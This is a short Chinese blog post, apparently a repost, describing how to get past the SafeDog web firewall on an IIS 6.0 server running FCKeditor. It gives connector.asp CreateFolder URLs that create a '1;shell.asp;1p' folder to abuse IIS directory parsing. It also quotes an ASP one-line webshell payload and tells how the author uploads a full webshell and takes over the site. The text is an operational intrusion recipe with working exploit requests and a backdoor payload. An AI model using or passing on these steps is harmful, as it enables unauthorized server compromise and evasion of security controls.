FCK变异目录突破安全狗
作者:admin 发布于:2013-10-3 23:28 Thursday 分类:网络转载
安全狗升级了还是各种被咬,咬的蛋疼了。POST数据直接拦截!
今天遇到个FUK还是安全狗,在上传文件后自动重命名。
一句话<%Y=request(“X”)%> <%execute(Y)%>
直接插入图片一句话貌似安全狗对此post不会拦截。
IIS6.0下解析创建文件夹.变_无语
用FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
创建shell.asp成功
然后自己上图片一句话,上传成功但是在解析后直接被狗咬住了
搞了好久一直被咬的没有法办。
最后想到用FCK来创建变异目录利用如下
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/ 1;shell.asp;1p&NewFolderName=z&uuid=1244789975684
来创建1;shell.asp;1p文件夹
后面继续上传
这下应该解析了。
一句话上传成功。
菜刀连接肯定不行的。
用利用HTML的一句话客户端直接连接
直接上传大马3.txt成功成功解析拿下
标签: fck0day